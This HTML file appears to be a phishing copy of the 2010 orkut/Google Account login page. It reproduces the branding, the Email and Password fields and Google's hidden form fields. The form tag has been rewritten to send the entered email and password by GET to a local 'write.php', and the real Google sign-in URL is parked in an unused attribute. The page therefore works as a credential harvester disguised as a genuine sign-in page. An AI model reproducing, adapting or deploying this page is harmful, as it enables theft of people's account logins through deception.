
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>orkut - login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <script type=text/javascript>
  var startTime = (new Date()).getTime();
  </script>
  <style type="text/css">
  body { background-color: #D4DDED; color: #000; font-family: Verdana, Arial, sans-serif; font-size: 12px; margin: 10px }
  .newText { padding: 10px 20px; line-height: 1.5em; font-size: 12px; text-align: center }
  .magenta { color: #B11E89 }
  .newMain { background: #FFF; padding: 15px }
  .newGaia { background: #FFF; padding: 3px }
  .spacer { height: 7px; background-color: #D4DDED; margin: 3px -3px }
  .newFooter { background-color: #BCCDE9; margin: 10px 0 0 0; font-size: 12px; padding: 5px; text-align: center }
  .joinNow { font-size: 12px; background: #E8EEFA; padding: 8px 3px; text-align: center; line-height: 1.7em }
  a:link { color: #0047BE; text-decoration: underline; font-size: 100% }
  a:visited { color: #0047BE; text-decoration: underline }
  a:hover { color: #C40098; text-decoration: underline }
  </style>
</head>
<body onload="gaia_setFocus()">
  <table border="0" cellpadding="0" cellspacing="0" width="100%">
  <tbody>
  <tr>
  <td class="newMain">
  <div align="center">
  <img src="https://img1.orkut.com/img/doodle/orkut_logo.gif" alt="Who do you know?" title="Who do you know?" style="border: none;">
  </div>
  <div class="newText">
  <b class="magenta">Connect</b> with friends and family using scraps and instant messaging <br><b class="magenta">Discover</b> new people through friends of friends and communities <br><b class="magenta">Share</b> your videos, pictures, and passions all in one place
  </div>
  </td>
  <td width="10px">
  </td>
  <td valign="top" class="newGaia" width="264">
<script><!--

function gaia_onLoginSubmit() {

  if (window.gaiacb_onLoginSubmit) {
    return gaiacb_onLoginSubmit();
  } else {
    return true;
  }

}


function StripParam(url, param) {
  if (url.search(param) == -1) {
    return url;
  }
  var firstParamRegExp = new RegExp('\\?' + param + '&');
  var paramRegExp = new RegExp('(\\?|&)' + param);
  url = url.replace(firstParamRegExp, '?');
  url = url.replace(paramRegExp, '');
  return url;
}


function GetForm() {
  var f = null;
  if (document.getElementById) {
    f = document.getElementById('gaia_loginform');
  } else if (window.gaia_loginform) {
    f = window.gaia_loginform;
  }
  return f;
}

function AddUrlParam(url, param, value) {
  return url + ((url.search(/\?/) == -1) ? '?' : '&') + param + '=' + value;
}

var focusTime;
function gaiacb_onLoginSubmit() {
  var CONTINUE = 'continue';
  var f = GetForm();
  if (f) {
    var continueUrl = f[CONTINUE].value;
    if (continueUrl != null &&  continueUrl != '') {
      var lts = new Date().getTime();
      continueUrl = StripParam(continueUrl, 'ts=[0-9]*:[0-9]*:[0-9]*');
      var tsParam = startTime + ':' + focusTime + ':' + lts;
      continueUrl = AddUrlParam(continueUrl, 'ts', tsParam);
      f[CONTINUE].value = continueUrl;
    }
  }
  return true;
}

function gaia_setFocus() {
  var f = GetForm();
  if (f) {
    if (f.Email.value == null || f.Email.value == "") { 
      f.Email.focus();
    } else if (f.Passwd) {
      f.Passwd.focus();
    }
    focusTime = (new Date()).getTime();
  }
}
--></script>
<style type="text/css"><!--
  div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; }
  font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; }  
--></style>
<style type="text/css"><!--
.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }
.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }
.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }

.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } 
.gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; }
  
--></style>
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="0" cellpadding="5" width="100%" border="0">
  <tr>
  <td valign="top" style="text-align:center" nowrap="nowrap" 
        bgcolor="#E8EEFA">
  <form id="gaia_loginform" action=write.php id="https://www.google.com/accounts/ServiceLoginAuth?service=orkut" method=GET
        id="(gaia_onLoginSubmit());">
  <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
  <tr>
<td colspan="2" align="center">
  <font size="-1">
  Sign in to
  orkut
  with your
  </font>
  <table>
  <tr>
  <td valign="top">
  <img src="google_transparent.gif"
           alt="Google">
  </img>
  </td>
  <td valign="middle">
  <font size="+0"><b>Account</b></font>
  </td>
  </tr>
</table>
</td>
</tr>
  <script type="text/javascript"><!--
    function onPreCreateAccount() {
    
      return true;
    
    }

    function onPreLogin() {
    
      
      if (window["onlogin"] != null) {
        return onlogin();
      } else {
        return true;
      }
    
    }
  --></script>
<tr>
  <td colspan="2" align="center">
  </td>
</tr>
<tr>
  <td nowrap="nowrap">
  <div align="right">
  <span class="gaia le lbl">
  Email:
  </span>
  </div>
  </td>
  <td>
  <input type="hidden" name="continue" id="continue"
           value="http://www.orkut.com/RedirLogin?msg=0&amp;page=http%3A%2F%2Fwww.orkut.com%2FHome" />
  <input type="hidden" name="service" id="service"
           value="orkut" />
  <input type="hidden" name="cd" id="cd"
           value="US" />
  <input type="hidden" name="skipvpage" id="skipvpage"
           value="true" />
  <input type="hidden" name="sendvemail" id="sendvemail"
           value="false" />
  <input type="hidden" name="rm" id="rm"
           value="false" />
  <input type="hidden" name="dsh" id="dsh"
           value="-7600045544758352694" />
  <input type="hidden" name="hl" id="hl"
           value="en-US" />
  <input type="hidden"
             name="GALX"
             value="l9_VPKW53vE" />
  <input type="text" name="Email"  id="Email"
  size="18" value=""
  
  
    class='gaia le val'
  
  />
  </td>
</tr>
<tr>
  <td></td>
  <td align="left">
  </td>
</tr>
<tr>
  <td align="right" nowrap="nowrap">
  <span class="gaia le lbl">
  Password:
  </span>
  </td>
  <td>
  <input type="password"
   name="Passwd" id="Passwd"
  size="18" 
  
  

  
    class="gaia le val" 
  
  />
  </td>
</tr>
<tr>
  <td>
  </td>
  <td align="left">
  </td>
</tr>
  <tr>
  <td align="right" valign="top">
  <input type="checkbox" name="PersistentCookie" id="PersistentCookie"
    value="yes"
  
    
  
  />
  <input type="hidden" name='rmShown' value="1" />
  </td>
  <td>
  <label for="PersistentCookie" class="gaia le rem">
  Remember me on this computer.
  </label>
  <div style="color: #667788; margin-top: 3px; font-size: 11px;">
  Do not use on public computers. [<a href="http://help.orkut.com/bin/answer.py?answer=66395&hl=en">?</a>]
  </div>
  </td>
</tr>
<tr>
  <td>
  </td>
  <td align="left">
  <input type="submit" class="gaia le button" name="signIn"
           value="Sign in"
                  />
  </td>
</tr>
<tr id="ga-fprow">
  <td colspan="2" height="33.0" class="gaia le fpwd"
    align="center" valign="bottom">
  <a href="http://www.google.com/support/accounts/bin/answer.py?answer=48598&amp;hl=en&amp;ctx=ch_ServiceLogin&amp;p=orkut&amp;fpUrl=https%3A%2F%2Fwww.google.com%2Faccounts%2FForgotPasswd%3FfpOnly%3D1%26continue%3Dhttp%253A%252F%252Fwww.orkut.com%252FRedirLogin%253Fmsg%253D0%2526page%253Dhttp%25253A%25252F%25252Fwww.orkut.com%25252FHome%26cd%3DUS%26hl%3Den-US%26service%3Dorkut%26skipvpage%3Dtrue"
       target=_top>
  Can&#39;t access your account?
  </a>
  </td>
</tr>
  </table>
  </form>
  </td>
  </tr>
</table>
</div>
  <div class="spacer"></div>
  <div class="joinNow">
  Not a member yet?<br>
  <a href="https://www.google.com/accounts/NewAccount?continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1&service=orkut&hl=en"><b>JOIN NOW</b></a>
  </div>
  </td>
  </tr>
  </tbody>
  </table>
  <div class="newFooter">
  &copy;2010&nbsp;Google&nbsp;-&nbsp;<a href="http://www.orkut.com/About.aspx">About Orkut</a>&nbsp;-&nbsp;<a href="http://help.orkut.com/support/bin/answer.py?answer=48579&amp;hl=en">Safety Center</a>&nbsp;-&nbsp;<a href="http://www.orkut.com/Privacy.aspx">Privacy</a>&nbsp;-&nbsp;<a href="http://www.orkut.com/AdditionalTerms.aspx">Terms</a>
  </div>
</body>
</html>

